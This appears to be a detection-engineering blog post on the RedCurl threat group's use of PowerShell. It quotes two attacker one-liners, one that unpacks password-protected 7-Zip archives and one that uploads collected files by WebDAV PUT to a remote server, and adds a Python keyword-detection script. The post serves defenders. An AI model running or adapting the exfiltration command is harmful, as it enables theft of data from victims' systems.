046. RedCurl Abuses PowerShell for Collection and Exfiltration: Detection Opportunities

Hello everyone! Let's look at another curious case of PowerShell abuse. This time the adversary used it for data collection and exfiltration.


I took the following examples from the eSentire report on RedCurl (we track this activity cluster as Red Wolf).

The first example shows how the adversary uses 7-Zip to archive collected data:

powershell -c "gci .\*.exe | foreach {if(($_.VersionInfo).InternalName -eq '7za'){$syspack = $_.Fullname}};$a1='x';$a2='-aoa';$a3='-p'+$env:ppass2;$a4=$env:util;$a5='-o'+$env:tdir;&$syspack $a1 $a2 $a3 $a4 $a5;"

Look at that variable name - $syspack. The cluster loves this name and has also used it for naming the 7-Zip binary itself. From a detection perspective, you can focus on PowerShell executions with "gci" (Get-ChildItem), ".exe" and "7za", as well as the command line parameters commonly used by the threat actor with 7-Zip - "x", "-aoa", "-p" and "-o".

The second example - collected data exfiltration with PowerShell:

powershell -c "$PSW01 = New-Object -ComObject MSXML2.ServerXMLHTTP;$AFS = New-Object -ComObject ADODB.Stream;$AFS.Open();$AFS.Type = 1;Get-ChildItem .\$env:trdir | Where-Object {$_.PSIsContainer -eq $false;} | foreach {$AFS.LoadFromFile($_.FullName);$AFB = $AFS.Read();$PSW01.Open('PUT', $env:davstr+'/'+$env:davfld+'/'+$_.Name, $False, $env:slog, $env:spass);$PSW01.Send($AFB);};$PSW01.Close;"

As you can see, here we also have quite a few command line arguments we can use for detection, for example, "MSXML2.ServerXMLHTTP", "LoadFromFile", "PUT" and "Send".
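To show how the indicators from both examples can be turned into something that actually runs over process-creation telemetry, here is an added detection script. It is not from the post or from eSentire: the rule names, the "two or more 7-Zip switches" threshold and the benign command lines are my own assumptions, and the two malicious command lines are the ones quoted above. It models command lines as they would arrive from Sysmon Event ID 1 or Security Event ID 4688.

```python
"""Keyword-based detection for the RedCurl / Red Wolf PowerShell one-liners.

Added example, not code from the post or from eSentire. It scans process
creation command lines for the indicator combinations called out in the post.
Rule names and the switch threshold are assumptions made for this example.
"""
import re

# Constructed sample of command lines. Index 0 and 1 are the RedCurl one-liners
# quoted in the post; index 2-4 are constructed benign activity for contrast.
SAMPLE_COMMAND_LINES = [
    r'''powershell -c "gci .\*.exe | foreach {if(($_.VersionInfo).InternalName -eq '7za'){$syspack = $_.Fullname}};$a1='x';$a2='-aoa';$a3='-p'+$env:ppass2;$a4=$env:util;$a5='-o'+$env:tdir;&$syspack $a1 $a2 $a3 $a4 $a5;"''',
    r'''powershell -c "$PSW01 = New-Object -ComObject MSXML2.ServerXMLHTTP;$AFS = New-Object -ComObject ADODB.Stream;$AFS.Open();$AFS.Type = 1;Get-ChildItem .\$env:trdir | Where-Object {$_.PSIsContainer -eq $false;} | foreach {$AFS.LoadFromFile($_.FullName);$AFB = $AFS.Read();$PSW01.Open('PUT', $env:davstr+'/'+$env:davfld+'/'+$_.Name, $False, $env:slog, $env:spass);$PSW01.Send($AFB);};$PSW01.Close;"''',
    # benign: an admin listing executables, no 7-Zip involvement
    r'''powershell -c "Get-ChildItem C:\Logs\*.exe | Where-Object {$_.Length -gt 1MB}"''',
    # benign: 7-Zip run directly, not through PowerShell
    r'''"C:\Program Files\7-Zip\7za.exe" x -aoa -pSecret archive.7z -oC:\out''',
    # benign: a PUT upload that does not use the MSXML2/ADODB combination
    r'''powershell -c "Invoke-WebRequest -Uri https://example.invalid/report -Method PUT -InFile .\report.txt"''',
]

# Each rule: every "all" token must appear, at least one "any" token must
# appear (if the list is non-empty), and at least min_switches of the
# "switches" tokens must appear. Matching is case-insensitive.
RULES = {
    "redcurl_7zip_archiving": {
        "all": ["7za", "*.exe"],
        "any": ["gci", "get-childitem"],
        # 7-Zip switches as they appear in the quoted command line
        "switches": ["'x'", "'-aoa'", "'-p'", "'-o'"],
        "min_switches": 2,
    },
    "redcurl_webdav_put_exfil": {
        "all": ["msxml2.serverxmlhttp", "loadfromfile", "'put'", ".send("],
        "any": [],
        "switches": [],
        "min_switches": 0,
    },
}


def is_powershell(cmd):
    """True if the command line launches PowerShell (powershell.exe or pwsh)."""
    return re.search(r"\b(powershell|pwsh)(\.exe)?\b", cmd, re.IGNORECASE) is not None


def evaluate(cmd, rule):
    """Apply one rule's all/any/switch-count conditions to a command line."""
    lowered = cmd.lower()
    if not all(tok in lowered for tok in rule["all"]):
        return False
    if rule["any"] and not any(tok in lowered for tok in rule["any"]):
        return False
    hits = sum(tok in lowered for tok in rule["switches"])
    return hits >= rule["min_switches"]


def scan(cmd):
    """Return the names of rules matching one command line (empty if none).

    Both rules are gated on the process being PowerShell, as the post frames
    them as PowerShell execution detections.
    """
    if not is_powershell(cmd):
        return []
    return [name for name, rule in RULES.items() if evaluate(cmd, rule)]


def scan_all(lines):
    """Map the index of every alerting command line to the rules it triggered."""
    return {i: hits for i, cmd in enumerate(lines) if (hits := scan(cmd))}


if __name__ == "__main__":
    for idx, rules in scan_all(SAMPLE_COMMAND_LINES).items():
        print(f"[{idx}] {', '.join(rules)}: {SAMPLE_COMMAND_LINES[idx][:60]}...")
```

Run as-is, only the two quoted RedCurl command lines alert; the Get-ChildItem listing, the direct 7za.exe invocation and the Invoke-WebRequest PUT all stay quiet, which is the point of requiring the indicator combination rather than any single keyword. Plain command-line matching like this is brittle against string concatenation or encoded commands, so in production pair it with PowerShell script block logging (Event ID 4104), where the decoded script content becomes visible.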

PowerShell enables adversaries to solve almost any task, so it's very important to track various procedure examples!

See you tomorrow!
